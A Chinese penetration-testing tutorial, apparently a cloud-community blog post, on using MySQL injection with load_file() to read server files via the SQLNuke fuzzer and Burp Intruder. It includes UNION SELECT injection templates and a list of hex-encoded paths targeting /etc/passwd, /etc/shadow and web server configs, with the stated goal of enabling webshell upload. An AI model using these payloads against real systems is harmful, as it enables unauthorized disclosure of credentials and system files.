MySQL注入Load_File()函数应用

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 高可用系列,价值2615元额度,1个月
简介: MySQL注入Load_File()函数应用

0x01 前言

相信很多人在渗透测试过程中都有遇到过这种情况:一个MySQL Root高权限注入点,也具备读取和写入权限,这时只需要找到网站绝对路径就可以写入Webshell了,但如果利用所有已知方法还是找不到网站绝对路径呢?这节我将给大家介绍一款注入辅助工具和BurpSuite利用方式


0x02 SQLNuke工具介绍

SQLNuke是一款用ruby编写的MySQL load_file Fuzzer工具,可以在找到网站高权限注入漏洞时辅助使用,它可以将目标系统中存在的文件下载到本地。


工具的原理也很简单,使用load_file函数配合路径字典来探测哪些文件可被读取并下载到本地磁盘。

    sql.rb                  //主程序
    config.yml              //配置文件
    lib/                    //基础库目录
    output/                 //输出目录
    inputs/packset.lst      //字典文件
    class/methods.rb        //类文件
      root@Jacks:~/sqlnuke-master# ./sql.rb -h
          -u, --url URL      Link with 'XxxX' ex: http://tar.com/?id=1+UNION+SELECT+1,XxxX,2--
          -d, --data DATA    POST DATA ex: id=-1+Union+Select+null,XxxX,null--&name=John
          -x, --hex                      Hex Conversion
              --proxy http://IP:PORT     HTTP Proxy
              --os (linux,win)           Target Server OS (linux,win)
              --agent AGENT              User-Agent for the header
              --ref REFERER              Referer for the header
              --cookie COOKIE            Cookie for the header
          -h, --help                     Information about commands


      0x03 利用BurpSuite测试

      我们可以把SQLNuke工具的字典文件拷贝到本地,然后自己添加一些Apache、phpMyAdmin或者其它常见敏感文件的绝对路径。


      SQLNuke在执行时会将字典里的路径自动转换成Hex编码,而BurpSuite不会自动转换Hex编码,所以得先把拷贝下来的字典文件的路径转换为Hex(十六进制),且得在Hex前加“0x”。注:BurpSuite中有一个Encode as ASCII hex选项可以进行编码!

      • BurpSuite->Intruder->Payloads->Payload Processing->Add->Encode(Encode as ASCII hex)
      0x2F6574632F706173737764
      0x2F6574632F736861646F77
      0x2F6574632F67726F7570
      0x2F6574632F686F737473
      0x2F6574632F617061636865322F6C6F67732F6163636573732E6C6F67
      0x2F6574632F68747470642F6163636573732E6C6F67
      0x2F6574632F696E69742E642F6170616368652F68747470642E636F6E66
      0x2F6574632F696E69742E642F617061636865322F68747470642E636F6E66
      0x2F7573722F6C6F63616C2F617061636865322F636F6E662F68747470642E636F6E66
      0x2F7573722F6C6F63616C2F6170616368652F636F6E662F68747470642E636F6E66
      0x2F686F6D652F6170616368652F68747470642E636F6E66
      0x2F686F6D652F6170616368652F636F6E662F68747470642E636F6E66
      0x2F6F70742F6170616368652F636F6E662F68747470642E636F6E66
      0x2F6574632F68747470642F68747470642E636F6E66
      0x2F6574632F68747470642F636F6E662F68747470642E636F6E66
      0x2F6574632F6170616368652F6170616368652E636F6E66
      0x2F6574632F6170616368652F68747470642E636F6E66
      0x2F6574632F617061636865322F617061636865322E636F6E66
      0x2F6574632F617061636865322F68747470642E636F6E66
      0x2F7573722F6C6F63616C2F617061636865322F636F6E662F68747470642E636F6E66
      0x433A5C626F6F742E696E69
      0x433a5c77616d705c62696e5c6170616368655c6c6f67735c6163636573732e6c6f67
      0x433a5c77616d705c62696e5c6d7973716c5c6d7973716c352e352e32345c77616d707365727665722e636f6e66
      0x433a5c77616d705c62696e5c6170616368655c617061636865322e322e32325c636f6e665c68747470642e636f6e66
      0x433a5c77616d705c62696e5c6170616368655c617061636865322e322e32325c636f6e665c77616d707365727665722e636f6e66
      0x433a5c70687053747564795c4170616368655c636f6e665c68747470642e636f6e66
      0x433a5c77696e646f77735c73797374656d33325c696e65747372765c4d657461426173652e786d6c

      将上图中抓取到的SQL注入点数据包发送到Intruder模块,接着选择第2项Positions,点击“Clear$”清除默认参数然后选中数据包中“load_file(xxxx)”括号里的“xxxx”,点击“Add$”即可。

      这时切换到第3项Payloads加载我们事先准备好的字典,然后再切换到第4项Options设置下线程数都设置好了以后就可以点击BurpSuite菜单栏上的Intruder选项,点击Start Attack进行测试。

      等测试完后,可以根据返回数据包的Length(长度)大小进行排序这里会看到返回数据包的Length都不一样,因为返回的数据包里包含了不同的SQL注入语句,所以最终输出的Length也不一样。

      相关实践学习
      如何在云端创建MySQL数据库
      开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
      全面了解阿里云能为你做什么
      阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助     相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
      相关文章
      |
      1月前
      |
      JSON 关系型数据库 MySQL
      Mysql(5)—函数
      MySQL提供了许多内置的函数以帮助用户进行数据操作和分析。这些函数可以分为几类,包括聚合函数、字符串函数、数值函数、日期和时间函数、控制流函数等。
      70 1
      Mysql(5)—函数
      |
      25天前
      |
      存储 关系型数据库 MySQL
      MySQL在企业内部应用场景有哪些
      【10月更文挑战第17天】MySQL在企业内部应用场景有哪些
      36 0
      |
      25天前
      |
      存储 关系型数据库 MySQL
      介绍一下MySQL的一些应用场景
      【10月更文挑战第17天】介绍一下MySQL的一些应用场景
      111 0
      |
      2月前
      |
      canal 消息中间件 关系型数据库
      Canal作为一款高效、可靠的数据同步工具,凭借其基于MySQL binlog的增量同步机制,在数据同步领域展现了强大的应用价值
      【9月更文挑战第1天】Canal作为一款高效、可靠的数据同步工具,凭借其基于MySQL binlog的增量同步机制,在数据同步领域展现了强大的应用价值
      624 4
      |
      13天前
      |
      关系型数据库 MySQL Serverless
      MySQL函数
      最常用的MySQL函数,包括聚合函数,字符串函数,日期时间函数,控制流函数等
      |
      1月前
      |
      架构师 关系型数据库 MySQL
      MySQL最左前缀优化原则:深入解析与实战应用
      【10月更文挑战第12天】在数据库架构设计与优化中,索引的使用是提升查询性能的关键手段之一。其中,MySQL的最左前缀优化原则(Leftmost Prefix Principle)是复合索引(Composite Index)应用中的核心策略。作为资深架构师,深入理解并掌握这一原则,对于平衡数据库性能与维护成本至关重要。本文将详细解读最左前缀优化原则的功能特点、业务场景、优缺点、底层原理,并通过Java示例展示其实现方式。
      68 1
      |
      1月前
      |
      关系型数据库 MySQL 数据库
      MySQL数据库:基础概念、应用与最佳实践
      一、引言随着互联网技术的快速发展,数据库管理系统在现代信息系统中扮演着核心角色。在众多数据库管理系统中,MySQL以其开源、稳定、可靠以及跨平台的特性受到了广泛的关注和应用。本文将详细介绍MySQL数据库的基本概念、特性、应用领域以及最佳实践,帮助读者更好地理解和应用MySQL数据库。二、MySQL
      109 5
      |
      16天前
      |
      SQL NoSQL 关系型数据库
      |
      1月前
      |
      存储 SQL 关系型数据库
      MySQL 存储函数及调用
      MySQL 存储函数及调用
      54 3
      |
      1月前
      |
      缓存 关系型数据库 MySQL
      MySQL 满足条件函数中使用查询最大值函数
      MySQL 满足条件函数中使用查询最大值函数
      120 1